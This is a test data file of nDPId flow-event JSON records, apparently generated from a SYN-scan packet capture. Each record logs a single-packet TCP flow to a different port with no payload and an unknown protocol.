+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 